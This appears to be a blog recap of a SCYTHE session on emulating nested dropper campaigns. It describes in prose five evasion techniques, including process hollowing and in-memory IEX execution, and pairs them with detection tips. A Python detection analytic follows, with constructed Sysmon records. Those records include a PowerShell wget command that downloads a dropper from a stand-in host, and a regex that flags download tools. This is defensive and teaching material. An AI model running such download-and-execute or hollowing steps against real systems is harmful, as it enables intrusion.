In a recent Threat Thursday Live session, the team at SCYTHE delved into a recurring question from users and workshop attendees: How do you emulate nested campaigns, especially in scenarios involving droppers and second-stage payloads? Whether you're using SCYTHE or another command-and-control (C2) framework, this guide walks you through several techniques that simulate threat actors launching secondary implants or campaigns.
Nested campaigns mimic a realistic threat scenario where a primary payload (often referred to as a "dropper") launches additional payloads. This approach reflects how adversaries limit each component’s functionality for stealth and evasion. Rather than having a single implant carry out an entire attack chain, tasks are split among multiple binaries or scripts.
This method:
In the session, five core techniques were demonstrated to emulate these behaviors using SCYTHE's capabilities.
Method: Using SCYTHE’s virtual file system (VFS), a prebuilt executable (drop.exe) is transferred to the target machine via an existing C2 channel.
Execution: The executable is stored in the user's Downloads folder and executed using PowerShell.
Detection Tip: Because the file is delivered over the already-established C2 channel rather than fetched from a separate URL, there is no distinct internet download, making it harder to detect via conventional download monitoring.
Method: Utilizing a direct download link generated in SCYTHE, the dropper binary is retrieved with PowerShell's wget alias (Invoke-WebRequest) and executed.
Customization: These links can point to EXE, DLL, or client/hosted files, depending on your campaign's needs.
Method: Instead of direct download links, the binary is hosted in the public-facing VFS directory.
Benefit: Allows files to be staged externally and mimics the use of redirectors or compromised web servers. You can further disguise the download origin or pre-process the file with obfuscation tools like Donut.
Method: The downloaded campaign (converted into shellcode) is injected into a legitimate process (e.g., calc.exe), using process hollowing.
Why It Matters: This technique helps evade detection by making malicious activity appear to originate from a benign process.
Detection Tip: Look for suspicious parent-child relationships (e.g., calc.exe unexpectedly launching PowerShell or another implant).
Method: Use the Invoke-Expression (IEX) cmdlet to run scripts like SharpHound.ps1 directly from memory, avoiding disk writes.
Hosting: Scripts are hosted in the public VFS and pulled into the PowerShell session via HTTP.
Detection Tip: While command-line arguments are still logged, the script itself isn’t written to disk, requiring memory inspection or behavioral analysis for detection.
Method: A PowerShell script hosted in the VFS executes a wget download and starts the process, all managed via UpShell (unmanaged PowerShell), further reducing visibility.
Detection Consideration: Only the dropped file is written to disk; the command execution and download activities are often invisible to script block logging and process creation logs.
The team also demonstrated a small ransomware emulation as the dropped campaign:
Detection efforts should focus on:
File Creations by PowerShell/CMD. Monitoring these can surface suspicious droppers.
Command-Line Arguments. Look for unusual use of wget, IEX, or PowerShell re-invocation.
Process Trees. Tools like Splunk’s PSTree plugin or EDR platforms help visualize suspicious process hierarchies (e.g., PowerShell → Dropper → Calc.exe → PowerShell).
Anomalous Behavior from Common Binaries. Applications like calc.exe or chrome.exe should not spawn multiple child processes.
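As an added example (not code from the session or from SCYTHE), the following Python analytic applies those four checks to constructed Sysmon-style process-create (Event ID 1) and file-create (Event ID 11) records modelled on the chain above; the record layout, paths, PIDs and host name are assumptions.

```python
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry (assumed layout): PowerShell -> drop.exe -> calc.exe -> PowerShell,
# plus an unrelated notepad.exe as a benign control.
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 50, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "pid": 200, "ppid": 100, "image": PS,
     "cmd": "powershell -c wget http://staging.example/drop.exe -OutFile $env:USERPROFILE\\Downloads\\drop.exe"},
    {"id": 11, "pid": 200, "image": PS, "target": r"C:\Users\u\Downloads\drop.exe"},
    {"id": 1, "pid": 300, "ppid": 200, "image": r"C:\Users\u\Downloads\drop.exe", "cmd": "drop.exe"},
    {"id": 1, "pid": 400, "ppid": 300, "image": r"C:\Windows\System32\calc.exe", "cmd": "calc.exe"},
    {"id": 1, "pid": 500, "ppid": 400, "image": PS, "cmd": "powershell -nop -w hidden -c IEX (...)"},
    {"id": 1, "pid": 600, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}          # file creation by these is notable
QUIET_BINARIES = {"calc.exe", "chrome.exe", "notepad.exe"}       # should not spawn children at all
SUSPICIOUS_CMD = re.compile(r"\b(wget|curl|iex|invoke-expression|invoke-webrequest|downloadstring)\b", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, pid, detail) tuples for the detection focus areas listed above."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    children = defaultdict(list)
    for p in procs.values():
        children[p["ppid"]].append(p["pid"])
    alerts = []
    for e in events:  # file creations by script hosts surface droppers written to disk
        if e["id"] == 11 and basename(e["image"]) in SCRIPT_HOSTS:
            alerts.append(("file_create_by_script_host", e["pid"], e["target"]))
    for pid, p in procs.items():
        m = SUSPICIOUS_CMD.search(p["cmd"])  # wget / IEX / re-invocation keywords
        if m:
            alerts.append(("suspicious_cmdline", pid, m.group(0)))
        if basename(p["image"]) in QUIET_BINARIES and children[pid]:  # calc.exe with children
            alerts.append(("unexpected_child", pid, [basename(procs[c]["image"]) for c in children[pid]]))
    return alerts

def ancestry(events, pid):
    """Root-first process tree for one PID, the view a PSTree-style query would give."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    chain = []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return " -> ".join(reversed(chain))
```

On the constructed data, pid 500 resolves to explorer.exe -> powershell.exe -> drop.exe -> calc.exe -> powershell.exe, which is the hierarchy the session described.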
This walkthrough highlights just a few ways to simulate nested campaigns, from overt to highly stealthy techniques. While demonstrated using SCYTHE, many of these approaches are applicable across other platforms like Cobalt Strike, Empire, or custom tooling.